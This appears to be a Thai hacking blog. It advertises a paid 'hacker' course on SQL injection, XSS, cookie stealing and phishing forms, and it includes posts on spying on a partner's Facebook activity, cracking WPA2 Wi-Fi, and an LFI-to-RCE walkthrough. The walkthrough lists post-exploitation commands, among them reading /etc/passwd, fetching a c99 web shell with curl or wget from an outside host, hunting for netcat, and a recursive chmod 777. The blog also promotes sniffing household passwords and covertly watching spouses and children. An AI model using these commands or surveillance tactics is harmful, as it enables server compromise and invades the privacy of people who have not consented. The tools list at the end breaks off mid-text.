คอร์สเรียนแฮกเกอร์ Hacker&Security คนทำเว็บ/เรียนสายคอมห้ามพลาด

คอร์สเรียนเบสิกแฮกเกอร์ออนไลน์ - Hacker & Security

####################################################
รายละเอียด // อ่านก่อนค่อยทักแชทนะครับ

นับแต่วัน ที่ 2 กันยา 57
ผมขอแจ้งปรับเปลี่ยนเงื่อนไขจากเดิมคือ
จากเดิมลงเรียนเดี่ยว  >> เป็นการเรียนกลุ่ม ผ่านแชท Facebook เท่านั้น
(เหตุผลข้อเดียวคือ + พูดไม่เก่งครับ + ขี้เกียจพูดครับ ขอแชทกันไปก่อน
และไม่ได้เปิด สอนทุกวัน ไม่เปิด ทุกเดือน แต่เปิดตามอารมณ์
เพราะมันเหนื่อยจริงๆครับกับการ พิมพ์และตอบคำถามให้สามารถเข้าใจ

ระยะเวลาการสอน
ไม่จำกัดว่ากี่ชั่วโมงหรือกี่วัน
แต่จะสอนจนกว่าจะจบแล้วแต่จะสะดวกมาเรียนกันครับ

รูปแบบการสอน
-คอร์สเรียนแบบออนไลน์-แบบ Step by Step
-สมาชิกได้ลงมือทดลองด้วยตัวเอง
-เรียนผ่านแชท +Teamview เพื่อแก้ปัญหา


##################### หัวข้อที่สอนในคอร์ส #####################

++++[basic] Web Application Penetration Testing]++++
หมวดนี้เรียนรู้เกี่ยวกับช่องโหว่ของเว็บไซต์ล้วนๆ
เทคนิคการทดสอบแฮกช่องโหว่แบบ Manual - STEP BY STEP
และศึกษาโค้ดและการทำงานของช่องโหว่

การโจมตีของแฮกเกอร์ที่สามารถแฮกข้อมูล
ที่อยู่ภายในฐานข้อมูลของเว็บไซต์ ... บลาบลาบลา
#SQL Injection
#SQL Login Bypass
#Bypass WAF (Web Application Firewalls)
#Blind SQL Injection
--------------------------------------------

การโจมตีด้วยการใช้คำสั่งสคริปอันตรายต่างๆ
(แฮกผู้ใช้คอมพ์เพื่อรู้เท่าทัน)
#[XSS] Cross Site Scripting
#Reflected Cross Site Scripting
#Cookie Steal
#Cross Site Request Forgery[CSRF]
#File inclusion [RFI/LFI]
--------------------------------------------


+++++++[ปูพื้น-เบสิก-แฮกเกอร์]+++++++
#Phishing หัวข้อนี้สอนเป็น basic - html&php
- พื้นฐานการสร้างฟอร์มรับข้อมูลหน้าเว็บเพื่อใช้เก็บข้อมูลต่างๆ
#รู้จักกับ Exploit เรียนรู้กับช่องโหว่ของเว็บบอร์ดสำเร็จรูป
Smf,discuz,phpbb,wordpress ลฯล ที่เคยถูกค้นพบ เพื่อต่อยอดการเรียนรู้ ด้านช่องโหว่

#วิธีการและหลักการปลอมแปลง IP

#Sniffer สืบบุคคลในวงแลน
สืบแฟนเข้าเว็บอะไร , ลูกชายเล่นคอมพ์ทั้งคืน อยากรู้ว่าเข้าเว็บอะไร
เข้าดูเว็บไหนตอนใช้คอมพ์  รวมไปถึง ดักรหัสผ่าน ภายในวงแลนและใน Wifi
Sniffer จะทำให้คุณเป็นแม่บ้านนักสืบและ พ่อบ้านนักสืบ ที่สังเกตุการคนทั้งบ้านในอย่างอยู่หมัด

#รู้จักกับ Shell
อธิบายคุณสมบัติของ Shell และที่มาที่แท้จริง
รู้จักกับ Shell และความอันตรายที่ใช้ในการควบคุมเว็บไซต์ต่างๆที่ แฮกเกอร์ สามารถเจาะเข้าไปได้
เช่น การแก้ไขหน้าเว็บไซต์(Deface) การ Dump password (ขโมย Password ในฐานข้อมูลของเว็บไซต์)
########################################


ทั้งหมดนี้ ผมสอนในราคา >>>> 1500 บาท / คน
จากความเข้าใจของผมเอง...ตามที่ศึกษามา
และไม่มีการ COPY บทความจากที่อื่นมากสอนอย่างแน่นอน
เพื่อเป็นพื้นฐานให้กับเด็กๆรุ่นใหม่ และทุกๆคนที่สนใจ
สามารถทักแชทเข้ามาหาผม เพื่อขอหมายเลขบัญชี
และชื่อจริงของผม โดยไม่ต้องกลัวว่าผมจะโกงครับ
.................................................................................................................

(สังเกตุ พฤติกรรมผู้เรียนก่อนการสอนครับ)
ถ้ามองแล้วสอนไปไม่เกิดประโยชน์ + คาดว่าจะมีผลเสียตามมา ผมจะไม่เสียเวลา
//ทักแชทกันเข้ามานะครับ ...ขอบคุณทุุกคนที่สนใจครับ

ติดต่อ Facebook Profile : http://www.facebook.com/profile.php?id=100005505336690
Line & Tel. [ศูนย์แปดศูนย์]-428-6379
Read more

อยากเป็น Hacker - แฮกเกอร์ ต้องทำอย่างไร ?

อธิบายเกี่ยวกับ HACKER - แฮกเกอร์

 สอนแฮกเกอร์ =  สอนให้รู้จักการแฮก ที่แท้จริงของแฮกเกอร์ 
และประยุกค์นำไปใช้ในทางที่ดี  ดีกว่าอ่อน SECURITY จนโดนเขาแฮก

เว็บนี้เกิดจากการใช้แนวคิดในแง่มุมตอนที่ผมเริ่มหัดเรียนรู้ในด้านนี้ใหม่ๆ (แฮกเกอร์) เป็นการเรียนรู้ด้วยตัวเอง และเดินไปในทางที่ผิดพลาด
(ผมเสียเวลากับการเรียนรู้ที่ผิดพลาดมานานกว่า 5  ปี)
ค้นหาแต่เพียงเครื่องมือที่นำมาซึ่งความสบาย

แต่ภายในเราไม่รู้อะไรเกี่ยวกับมันอย่างลึกซึ้งเลย
จากคนที่มีความคิดในทางลบ  จึงอยากดึงคนที่สนใจ แฮกเกอร์เหล่านี้
เพื่อปรับเปลี่ยนแนวคิด ในคำว่า แฮก
ของคนกลุ่มนี้ให้ไปทางที่เกิดประโยชน์ต่อไป

การสนใจ "แฮกเกอร์" ไม่ผิด

แต่บางครั้งการศึกษาแบบไม่มีผู้แนะนำนั้น
ทำให้ผู้เริ่มต้นใหม่ๆอาจสนใจผิดในสิ่งที่ผิดได้
เช่นการเปิด Google : ค้นหา โปรแกรมแฮกเฟสบุ๊ค , โปรแกรมแฮก...ลฯล
ถือเป็นการเสียเวลา,ไม่ได้ความรู้ แถมอาจได้ไวรัส ,ถูกขโมยข้อมูลได้แบบไม่รู้ตัว

แล้วจะเป็น "แฮกเกอร์" ควรจะอ่านเรื่องอะไร

ถ้าผมเจอคำถามนี้ ผมมักจะตอบกลับไปว่า...
คุณมีอะไรอยู่ในมือ ?
กับ ทำอะไรแล้วมีความสุข  ?

ความรู้ประเภทไหนที่มันเข้าหัวได้เรื่อยๆ โดยที่คุณไม่รู้สึกรำคาญ
นั่นแหละครับคือสิ่งที่คุณต้องพยายาม ทำมันให้เต็มที่

เพราะในที่สุดแล้วต่อให้คุณพยามเรียนรู้
โดยตั้งเป้าไว้ที่คำว่า HACK เพียงคำเดียว
คำตอบนั้นกว้างมาก..ผลลัพธ์ที่ออกมาก็คือความท้อแท้
จนทำให้คุณรู้สึกเบื่อ จนเลิกที่จะเรียนรู้ไปเลยก็ได้

คำถามข้างบนนี้ จะให้คำตอบได้ว่า
คุณควรจะเป็น หรือ จะเป็นอะไรได้บ้าง ?
ตอบคำถามตัวเองแล้วเริ่มศึกษากับสิ่งนั้นอย่างจริงจัง...

สิ่งที่ควรสนใจในเส้นทางของ แฮกเกอร์ นั้น
หลักๆจะมี 4 สายวิชาให้เลือกศึกษาคือ


[1] Programing
สายนี้ สำหรับคนชอบการเขียนโปรแกรม เพื่อใช้งานกับคอมพ์พิวเตอร์
หรืออาจจะรวมไปถึงการเขียน Mobile Application เพื่อใช้งานบนมือถือด้วย ลฯล
ซึ่งแฮกเกอร์ส่วนมากก็ต้องศึกษาโค้ดกันด้วย....เพื่อเข้าใจกับการทำงานของโปรแกรม

ยกตัวอย่าง การที่จะแฮกเว็บ ซักเว็บหนึ่ง ก็ต้องเรียนรู้ภาษาของเว็บ
และเรียนรู้การใช้งานของระบบจัดการฐานข้อมูลของเว็บๆนั้นด้วย ลฯล
หรืออีกด้านคือการเขียนเพื่อใช้งานเอง ซึ่งสายนี้ก็มักจะเรียนรู้คู่กับการ Reverse Engineering

[2] Reverse Engineering
สำหรับคนที่ชอบโปรแกรมเมอร์ก็สามารถเรียนรู้ในเรื่อง Reverse Engineering ได้
เพราะกลุ่มนี้จะยุ่งอยู่กับโค้ดเหมือนๆกัน เช่น ทำการ Crack โปรแกรมแก้ไขไฟล์ของโปรแกรมนั้นๆให้สามารถใช้งานได้โดยไม่จำกัดเวลา
หรือ เปิดฟังชั่น ของโปรแกรมฟรี หรือจะเป็นการทำ Decompiler
เพื่อดู Source Code ของโปรแกรม   ลฯล

[3] Forensics
สำหรับคนที่ชอบแนว นักสืบ ที่จะทำเกี่ยวกับ
การตรวจสอบ การเก็บหลักฐาน, การค้นหา, วิเคราะห์
และการนำเสนอหลักฐานทางดิจิตอล เช่น การตามจับ HACKER

[4] Pentester
คือกลุ่มแฮกเกอร์ที่ทำการทดสอบเจาะระบบต่างๆ
แยกออกหลักๆ 3 ประเภทดังนี้

Web Application Penetration Testing

การทดสอบความปลอดภัยของเว็บไซต์ หรือพูดง่ายๆคือการ ทดสอบแฮกเว็บ
แฮกเกอร์กลุ่มนี้อย่างน้อยๆจะต้องมีความรู้ในเรื่องภาษาที่ใช้เขียนเว็บไซต์
และการใช้งานระบบจัดการฐานข้อมูล คำสั่งในด้าน Os Command
ของเว็บไซต์ ที่ทำการทดสอบ ลฯล  ภาษาที่แนะนำเพื่อเริ่มต้นคือ PHP & Mysql
และทำการ Vulnerability Assessment เพื่อประเมิณความอันตรายของช่องโหว่นั้นๆ

Client-Side Penetration Testing

คือกลุ่มแฮกเกอร์ ที่ชอบทดสอบแฮก USER หรือแฮกผู้ใช้คอมพ์ทั่วไป
โดยอาศัย ช่องโหว่ของ Software,Web browsers, Media players  ลฯล

Network Penetration Testing

เป็นการโจมตีที่กว้างมาก (อธิบายไม่หมด)
เริ่มตั้งแต่การทดสอบจากเครือข่ายภายใน LAN , WLAN , MAN , WAN
แนะนำให้ศึกษา OSI 7 Layer และ TCP/IP สำหรับการเริ่มต้น

อธิบายคำว่า "Security"

ตีความหมายออกมาให้เห็นภาพ ?

HACK = HACK
(ไม่ต้องรู้อะไรมาก รู้แค่วิธีการแฮกแค่นั้น)

SECURITY
เน้นการเรียนรู้หลักการทำงานของช่องโหว่
HACK ได้ (แค่บางคน)
ในทางปฏิบัติคำตอบก็คือการ "PENTEST"
เพื่อป้องกันระบบของตนเองให้รอดพ้นจากแฮกเกอร์
รวมถึงสามารถป้องกันได้ (อย่างถูกวิธี)


สุดท้ายการเป็น  JubChai แปลเป็นไทยคือ "จับฉ่าย"
อาจจะไม่ใช่กลุ่มจำพวกคนที่มั่วซั่ว แต่อาจจะหมายถึงคนที่ศึกษามันซะทุกอย่าง
จนสามารถไปต่อได้ในทุกๆด้าน และการนำความรู้เหล่านี้มาปรับใช้เข้าด้วยกันได้
(แต่ก็มีทางลึกของตัวเองอยู่เพียงหนึ่ง) คือที่มาของคำว่า "แฮกเกอร์"

 ฝากถึง "แฮกเกอร์" หรือเด็กมหาลัยชาว it ทุกคนที่สนใจ

ความพยามในการเรียนรู้สำคัญมาก
เชื่อว่าหลายๆคนอ่านมาถึงจุดนี้แล้วเพราะความสนใจจริง
แต่ในทางปฏิบัติ ผมขอตั้งคำถามไว้ว่า
ถ้าคุณเปิดเจอเนื้อหาที่อ่านแล้วไม่เข้าใจ
คุณจะยอมเสียเวลานั่งเซิส Google กันมั้ยครับ ?

    ถ้ายอม = การเรียนรู้ก็ไปต่อ = บทความนี้เป็นผลสำเร็จ
ถ้าไม่....การเรียนรู้ก็จบลงแค่นั้น...
ความฝันอยากเป็น "Hacker" ก็ยังเลือนลางต่อไป

นอกซะจากการขอคำแนะนำจากผู้รู้ที่รู้จัก หรือใช้การเรียนรู้ที่เร็วคือการถาม
แต่ในวงการ HACK ถ้าไม่สนิทจริงคงไม่มีใครสอนกันง่ายๆแน่นอน
เพราะฉนั้นผมจึงเปิดคอร์สออนไลน์นี้ไว้เป็นทางเลือกสำหรับคนที่อยากเรียนรู้เร็ว

คอร์สเรียน แฮกเกอร์ & Security ออนไลน์
 http://basic-hack.blogspot.com/2014/06/hacker-4657.html


ท้ายสุด.....การเรียนรู้ด้วยตัวเอง (แสวงหา)

ฝึกเป็นนักแปล การฝึกแปล สำคัญมาก
ถึงแม้เด็กๆรุ่นหลังมีมากที่ไม่ชอบการเรียนรู้ภาษา
แต่เหตุผลที่ต้องแปลเพราะบทความในไทย
อาจไม่มีไอเดียร์ที่ดี ให้อ่านกันมากเท่าไหร่
เปิดเจอบทความ ภาษาอังกฤษ ที่น่าสนใจให้ลุยได้เลยครับ
เพราะชีวิตคือการเรียนรู้ เราจึงต้องแสวงหา และเรียนรู้กันต่อไป

" เรียนรู้ > เข้าใจ > ใช้ จินตนาการ สร้างไอเดีย"
แฮก


Read more

เบสิก hacker ตอน แฮกคอมพ์แฟนสืบหากิ๊กบน Facebook

Hack เพื่อสแกนหา Cache ของ Web-browser บนคอมพ์

การแฮกเฟสบุ๊คที่ว่านี้ไม่ใช่การแฮกเว็บเฟสบุ๊ค , ไม่ใช่การแฮก Email ของ Facebook
แต่เป็นการแฮกเพื่อตรวจสอบว่าคุณได้เคยเยี่ยมชม ณ. Facebook ใคร ที่ใดกันมาบ้างเท่านั้น

เพราะฉนั้นบทความ Hack Facebook สรุปได้ว่า
เป็นการตรวจสอบเบื้องต้นเฉพาะส่วนของไฟล์ภาพ และตอบโจทย์ให้กับ
-คนที่ต้องการสืบสุดที่รักของคุณ ภายในบ้าน
-สืบพฤติกรรมของคนที่คิดว่าจะโดนนอกใจ
-สืบการใช้งาน อื่นๆ ตามความเหมาะสม
*ไม่แนะนำให้นำไปใช้ในการล่วงละเมิดสิทธิกับคนที่ไม่รู้จักนะครับ



ข้อมูลที่จะปรากฏบนโปรแกรมนี้
-ลิงค์ URL ของภาพ
-โปรแกรมWeb browser ที่ใช้เปิด
-ประเภทของภาพ (Profile image , Upload image , ) และเวลาที่โหลดภาพนั้นๆ
-ขนาดของภาพ , ที่อยู่ของไฟล์ภาพ
-สุดท้าย Original URL of the image
Read more

เบสิก hacker - ตอน แฮกเว็บแบบ [LFI 2 RCE]

เรียนรู้สถานะการณ์ HACKER แฮกเว็บด้วยภาษาบ้านๆ

ก่อนอื่นขอเกริ่นนำก่อน นะครับ
ผมไม่ใช่ผู้เชี่ยวชาญทางด้าน Web Application หรือ HACKER นะครับ หรือการแฮกเว็บ แต่อย่างใด นะครับ แต่เป็นความชอบ จึงขออภัยไว้ ณ. ที่นี้หากผิดพลาดประการใด นะครับ

(i'm not a hacker)

ฺBut ( Network [Data Communication] , Network security ) is my way of life.


เข้าเรื่อง.........ความเดิมจากตอนที่แล้ว

หลังจากโพสภาพดังกล่าว ไปเมื่อนานมานี้
ที่ facebook profile [ibasic-hack]
##############################################################
บทความนี้จึงขออธิบายเพียงเล็กน้อยเกี่ยวกับช่องโหว่ของเว็บไซต์
พื้นฐานอย่าง Local file Inclusion (LFI) คู่กับ Remote Code Execution (RCE)
หลายๆคนที่เซิสอ่านเรื่อง LFI คงเคยเจอกันมาบ้างแล้วนั่นคือ  LFI-RCE (proc/self/environ)

สรุปสั้นๆเพื่อสร้างความเข้าใจกับผู้เริ่มต้น

Local File Inclusion (LFI)
ช่องโหว่นี้ทำให้ HACKER สามารถเรียกอ่านเนื้อหาไฟล์ต่างๆภายในเว็บไซต์ได้

proc/self/environ
ที่อยู่นี้ให้มองว่าเป็นไฟล์หนึ่งของ ระบบปฏิบัติการ Linux ที่ทำให้สามารถ
ฝังโค้ด หรือ สามารถโจมตีเพื่อรันโค้ด PHP จากไฟล์นี้
อื่นๆอีกมาก ที่อาจเป็นได้ในกรอบของการโจมตีแบบ LFI TO RCE
เช่น ( access.log
/error.log
/var/log/messagesvar
/log/mysql.log
/var/log/user.log
etc. )

สาเหตุเพราะการแสดงข้อมูลที่มี User-Agent หรือข้อมูลใดใด ของฝั่งผู้ใช้ บนไฟล์นี้
หมายความว่าถ้าหาก ! HACKER เจอช่องโหว่ LFI แล้ว
ก็ทำการค้นหา (Traversal path) (ตามภาพ) จนพบที่อยู่ของ proc/self/environ
และทำการโจมตีต่อด้วย Remote Code Execution (RCE)
คือการโจมตีด้วยการใช้คำสั่งของ Os Command จากการระยะไกลได้

จากภาพหลายคนที่สงสัยว่า ../../../../../../ คืออะไร ?
คำตอบ : ก็คือ Traversal path 
เปรียบเหมือนการกด BACK กลับ ...ขณะที่เราเปิด folder บน Windows
เพื่ออ้างถึงที่อยู่ของไฟล์ที่แท้จริง

หลังจากนั้น HACKER จะทำการฝังโค้ดลงไป
ด้วยการที่ HACKER จะสามารถเปลี่ยนค่า User-Agent
จากข้อมูลที่ Browser ส่งออกไปติดต่อกับฝั่งเว็บ จากเดิม
ให้เป็นโค้ด PHP โดย HACKER จะใช้ปลั๊กอินของ Firefox ชื่อ Live HTTP Header
https://addons.mozilla.org/en-us/firefox/addon/live-http-headers/
หรือ User agent Switcher
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

ก็จะสามารถ ใช้คำสั่งตามด้านล่างเหล่านี้ที่ผมพอจำได้
อีกทางเลือกคือ มาลงเรียนคอร์สเรียน Hacker & Security
ก็จะได้เจอกับ  9 ช่องโหว่ของเว็บไซต์และได้ทดสอบโจมตีจริง (บนเว็บที่ใช้ทดสอบ)
รวมทั้ง BASIC-HACKER ทั่วไป

คลิปตัวอย่างการโจมตี


ส่วนท้ายสุดต่อไปเป็นคำสั่งพื้นฐานที่ใช้บ่อย เล็กๆน้อยๆ
ครับสำหรับคนที่ทำ LFI TO RCE สำเร็จ
เพื่อที่จะพิจารณาได้ว่าหา HACKER แฮกเข้ามาสำเร็จจะได้สิทธิ์ใดบนระบบ
รวมไปถึงสามารถดำเนินการคำสั่งใดใด ได้มากน้อยเพียงใด
สุดท้าย ศึกษาคำสั่งพื้นฐานทั่วไป
คำสั่งแรกที่ใช้  :   uname -a  ( -a ก็คือ ALL )
เพื่อที่จะแสดงข้อมูลของระบบทั้งหมดตามด้านล่างนี้

-s, --kernel-name        print the kernel name
-n, --nodename           print the network node hostname
-r, --kernel-release     print the kernel release
-v, --kernel-version     print the kernel version
-m, --machine            print the machine hardware name
-p, --processor          print the processor type or "unknown"
-i, --hardware-platform  print the hardware platform or "unknown"
-o, --operating-system   print the operating system


คำสั่งด้านล่างนี้ ใช้ร่วมกันจินตนาการ + การฝึกฝน 

whoami                                                              // ฉันคือใคร ?
pwd                                                                  // ฉันอยู่ที่ไหน ? - print working directory
cd ~                                                                 // ย้ายไปยังไดเรกทอรี่หลักของ user home/username
cd ..                                                                // ถอยกลับไปยังไดเรกทอรีหลักของไดเรกทอรีปัจจุบัน
cd /home/httpd/vhost/akone/basichack            // ย้ายไปยังไดเรกทอรี่ /home/httpd/vhosts/akone/basichack/

cat /etc/passwd                                               // แสดงเนื้อหาของไฟล์ /etc/passwd
cat "text" > myfile.txt                                       // cat "text" ไปเขียนทับเนื้อหาเดิมในไฟล์ myfile.txt
cat file1.txt file2.txt                                                 //  ดูเนื้อหาในไฟล์ 1.txt ต่อท้ายด้วย 2.txt ในทีเดียว
cat file1.txt file2.txt > output.txt           // ถ้าผลลัพธ์มันยาว เราก็จะใช้ > ให้เขียนลงไฟล์ใหม่ชื่อ Output.txt

ls -la   // แสดงรายชื่อไฟล์,โฟล์เดอร์ และรายละเอียด

curl -o shell.php http://www.test.com/c99.txt  
//หากมีการใช้งาน curl ก็สามารถอัพโหลดไฟล์ชื่อ shell.php โดยใช้เนื้อหาจาก c99.txt

wget http://www.test.com/c99.txt -o shell.php    
// หรือใช้ wget เนื้อหาจาก c99.txt มาเก็บไว้ใน shell.php ณ.ไดเรกทอรี่ปัจจุบัน

more /etc/passwd                                                             // อ่านเนื้อหาของแฟ้ม /etc/passwd
mkdir pentest                                                                   // สร้างไดเรกทอรี่ใหม่ชื่อ pentest

cp                   // Copy file

ตัวอย่าง
cp /home/public_html/file-copy.txt /home/public_html/forums/file-paste.php

find / -name config.php                                  //  ใช้ค้นหาแฟ้ม config.php ในทุก directory
find / -name hello*                                         //  ใช้ค้นหาแฟ้มที่ขึ้นต้นด้วยคำว่า hello

::: orther :::
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

chmod 777 file.php              //  Set permission 777 ให้ไฟล์ file.php ในไดเรกทอรี่ที่เราอยู่
chmod 777 * -Rf                // Set permission 777 ให้ทุกไฟล์ และในทุกไดเรกทอรี่ย่อยจากปัจจุบัน

netstat > output.txt               // เช็ค ip ที่ติดต่อกับเซิฟเวอร์ เหมือนบน windows
[see file] www.example.com/path/output.txt

chown ak1:users X          // เปลี่ยนเจ้าของของแฟ้ม X ให้เป็น ak1 และอยู่ในกลุ่มของ users
chgrp users X                   // เปลี่ยนกลุ่มของแฟ้ม X ให้เป็นกลุ่มของ users

[lif] google dork list : http://pastebin.com/1gdZt6zY          

--------------------------
ak1 -  baisc-hack.blogspot ดอทคอม

Read more

hack wifi - แฮกไวไฟ wpa2-psk ด้วย windows (ไม่ใช่ backtrack)

เพื่อง่ายต่อการทดลองกับ 2 คำถามคาใจบนโลกอินเตอร์เน็ต - Hack wifi , Hack wireless ที่เป็น WPA2-PSK ด้วย Windows

 Hack Wifi , Hack Wireless ไม่ใช่  backtrack OS
วิธีการทำบน Windows ในรูปแบบที่บุคคลทั่วๆไปได้เริ่มทดสอบ และทำความเข้าใจได้ง่ายขึ้น

############ Tools ############
- Elcomsoft Wireless Security Auditor
http://www.elcomsoft.com/ewsa.html


Read more

สุดยอด 49 เครื่องมือ ทางด้าน Network Security (ไม่ใช่โปรแกรมแฮก)

ไม่ใช่โปรแกรมแฮกของ "Hacker" , แฮกเกอร์
จุดประสงค์สำหรับผู้ที่ต้องการศึกษาช่องโหว่ของระบบ Network

แปะไว้สำหรับคนที่กำลังค้นหา โปรแกรมแฮก เฟสบุ๊ค , hotmail ลฯล
 Hack tools ต่างๆ  ลอง(ศึกษา) ของจริงกันดูครับ

#############################################################
.......วงการ Security มีเรื่องแปลกอย่างหนึ่ง ที่ยากจะหาได้ในสาขาอื่นๆ ของคอมพิวเตอร์ นั่นก็คือเรื่องของ HACKER

ผู้ดูแลระบบความปลอดภัย ที่ต่างก็ใช้ความรู้เดียวกัน เครื่องมือชุดเดียวกัน ในวัตถุประสงค์ที่แตกต่างกันอย่างสิ้นเชิง ฝ่ายหนึ่งใช้ความรู้และเครื่องมือเพื่อโจมตี แต่อีกฝ่ายใช้ความรู้และเครื่องมือเพื่อป้องกัน อาจเรียกได้ว่าเป็น "คนละด้านของดอลลาร์เดียวกัน" ในบทความนี้ผมจะแนะนำให้รู้จักกับเครื่องมือต่างๆ จำนวน 50 โปรแกรม บางโปรแกรมสามารถทำหน้าที่ได้ทั้งโจมตี(แฮก)และป้องกัน บางโปรแกรมก็เป็นโปรแกรมป้องกันเพียงอย่างเดียว

การจัดลำดับ 50 เครื่องมือนี้ ผมไม่ได้จัดเองหรอกครับ แต่เป็นการสำรวจของหน่วยงานที่ชื่อว่า InSecure.org ผู้สร้างโปรแกรม NMAP อันลือลั่น เป็นผู้จัดทำขึ้น โดยสอบถามจากผู้ที่มีอีเมล์อยู่ในลิสต์ (Mailing List) ของ InSecure.org ซึ่งถือว่าเป็นลิสต์ที่ครอบคลุมผู้ที่อยู่ในวงการ มากพอควร ดังนั้นการจัดอันดับนี้ จึงสมควรเชื่อถือได้ ในชุดโปรแกรมนี้ มีหลายๆ โปรแกรมที่สามารถนำไปใช้งานด้านมืดได้ แต่ก็สามารถนำไปใช้ประโยชน์ได้เช่นกัน เพราะการป้องกันที่ดีอย่างหนึ่ง ก็คือการทดลองโจมตีตัวเอง ดังนั้นรู้จักเครื่องมือเหล่านี้ไว้ ก็คงไม่เสียหลาย ก็ขอเริ่มเลยก็แล้วกันนะครับ โดยลำดับนี้จะเรียงตามความนิยมมากไปหาน้อยตามลำดับ

1) Nessus
เป็น เครื่องมือที่อยู่ในกลุ่ม Security Scanner แฮกเกอร์จะใช้สำหรับสแกนเครื่องคอมพิวเตอร์ผ่านระบบเครือข่าย เพื่อตรวจสอบหาจุดโหว่ของเครื่องเป้าหมาย แล้วรายงานให้ทราบ บางคนก็จะเรียกเครื่องมือประเภทนี้ว่า Remote Network Security Auditor สำหรับโปรแกรม Nessus นี้เป็นโปรแกรมที่ให้ดาวน์โหลดได้ฟรีครับ ไม่ต้องเสียเงินแต่อย่างใด โปรแกรม Nessus จะแบ่งส่วนการทำงานเป็น 2 ส่วน คือส่วนของเซิร์ฟเวอร์ซึ่งจะต้องทำงานกับ ระบบปฏิบัติการ ตระลยูนิกซ์ เช่น Linux หรือ FreeBSD และส่วนของ Client ที่ทำงานได้ทั้งบน Unix และ Windows ดังนั้นคนที่ไม่ถนัดยูนิกซ์ก็อาจจะไม่ถนัดโปรแกรมนี้ สำหรับการแสดงผลในส่วนของ Client สามารถแสดงผลในกราฟิกโหมดได้ เครื่องมือชุดนี้ถือว่าเป็นเครื่องมือที่มีประสิทธิภาพมากโปรแกรมหนึ่ง มีการอัพเดตฐานข้อมูล อย่างสม่ำเสมอ แถมยังฟรีอีกด้วย จึงเป็นโปรแกรมที่น่าใช้โปรแกรมหนึ่งที่อยากให้ผู้อ่านพิจารณา

2) Netcat
โปรแกรมนี้ได้ชื่อว่าเป็น "Swiss Army Knife" (ชุดเครื่องมืออเนกประสงค์ที่เรียกกันว่ามีดพับของสวิส) ของวงการ Security&Hacker โดยเป็นเครื่องมือที่ใช้ในการดักจับแพ็กเกตในเครือข่าย และสร้างแพ็กเกตเพื่อส่งเข้าไปในเครือข่าย การใช้งานสามารถใช้ได้ทั้งการเขียนโปรแกรมเพื่อเชื่อมต่อกับ Netcat และใช้ภาษาสคริปต์เพื่อสั่งงาน สามารถช่วยดีบั๊กการทำงานของเครือข่ายได้ ผู้ที่สนใจและศึกษาโพรโตคอล TCP/IP ไม่ควรพลาด โปรแกรม Netcat มีทั้งเวอร์ชันที่ทำงานกับระบบปฏิบัติการตระลยูนิกซ์ และระบบปฏิบัติการวินโดวส์ เครื่องมือนี้ฟรีอีกเช่นกันครับ

(Webmaster: สามารถทำหน้าที่เป็น Port scanner, Port Redirector รวมถึง Port Listenner ครับ)

3) Tcpdump
เครื่องมือ นี้จัดอยู่ในกลุ่ม Network Analyzer โดยมีความสามารถในการดักจับแพ็กเกต และ วิเคราะห์แพ็กเกตเพื่อตรวจสอบปัญหาที่เกิดขึ้นกับระบบเครือข่าย อันที่จริงเครื่องมือประเภทนี้มีอยู่มากมาย ทั้งแบบที่เสียเงินและแบบที่แจกฟรี หลายโปรแกรมมีความสามารถมากกว่าโปรแกรม Tcpdump ด้วยซ้ำไป แต่เหตุที่ Tcpdump ยังติดอันดับอยู่นั้น เนื่องจากโปรแกรมนี้เป็นโปรแกรมที่เกิดมาก่อน แถมยังแจกฟรีพร้อม Sourcecode มีการทำงานที่รวดเร็ว สามารถทำงานร่วมกับโปรแกรมอื่น และสามารถเป็นเครื่องมือให้โปรแกรมอื่นเรียกใช้ได้ ด้วยคุณสมบัติต่างๆ ที่กล่าวมา จึงทำให้ Tcpdump ได้รับเกียรติติดอันดับในครั้งนี้ด้วย โปรแกรม Tcpdump เป็นโปรแกรมที่ทำงานกับระบบยูนิกซ์ สำหรับตระลวินโดวส์นั้น มีผู้พอร์ตขึ้นมารันโดยใช้ชื่อว่า Windump ซึ่งก็ยังคงแจกฟรีพร้อมซอร์สโค้ดเหมือนกับบนยูนิกซ์

4) Snort
เครื่องมือที่อยู่ในกลุ่ม Network Intrusion Detection System (NIDS) ซึ่งทำหน้าที่ ตรวจจับการบุกรุกทางเครือข่าย ด้วยการดักจับข้อมูลที่วิ่งผ่านเครือข่าย แล้วตรวจสอบว่าแพ็กเกตที่วิ่งผ่านเครือข่ายนั้นมีลักษณะของการโจมตีหรือไม่ โปรแกรมนี้จะมีข้อดีที่ทำให้เราทราบถึงความพยายามในการโจมตี เพราะโดยทั่วไปเมื่อแฮ็กเกอร์จะโจมตีระบบ มักจะมีการสำรวจระบบก่อนจะเข้ามาโจมตีจริงๆ ซึ่งหากเราไม่ได้ติดตั้งโปรแกรมแบบนี้เอาไว้ เราก็จะไม่ทราบเลยว่ามีความพยายามที่จะทำเช่นนี้อยู่ เราอาจจะรู้อีกทีตอนที่เครื่องคอมพิวเตอร์ถูกแฮ็กไปเรียบร้อยแล้ว ดังนั้นโปรแกรมแบบนี้จะมีประโยชน์ในการแจ้งเตือน เมื่อมีความพยายามในการบุกรุกเกิดขึ้น เพื่อจะได้หาทางแก้ไข และป้องกันต่อไป โปรแกรม Snort เป็นโปรแกรมที่ทำงานได้ทั้งบนระบบ Unix และ Windows โปรแกรมนี้เป็นอีกโปรแกรมที่เก่ง ฟรี และแจก Sourcecode ด้วย

5) Saint
ย่อ มาจาก Security Administrator's Integrated Network Tool เป็นโปรแกรมที่อยู่ในกลุ่มของ Security Scanner โปรแกรมนี้พัฒนาขึ้นมาจาก SATAN ที่เป็นเวอร์ชันแจกฟรีมาเป็น Saint ซึ่งไม่ฟรีแล้ว โดยคิดเงินตามจำนวนเครื่องเช่น 845 ดอลลาร์สำหรับ 10 เครื่องแรก โปรแกรมนี้สามารถสแกนผ่านไฟร์วอลล์ได้ มีฐานข้อมูลสำหรับสแกนที่ทันสมัย และอัพเดตจากที่ต่างๆ เช่น CERT, CIAC มีการแสดงผลการทำงานผ่านเว็บ โปรแกรมนี้แม้จะไม่ฟรี แต่ก็ถือว่าราคาไม่แพง หากเทียบกับซอฟต์แวร์ของบริษัทชื่อดัง โดยสิ่งที่คุณจะได้จากซอฟต์แวร์ที่เสียเงิน คือได้คู่มือที่ดีกว่า ได้รับการสนับสนุนทางเทคนิค อ้อ! โปรแกรมนี้ได้รางวัล Information Security Excellence Award ประจำปี 2002 จากนิตยสาร Information Security ด้วยครับ


6) Ethereal
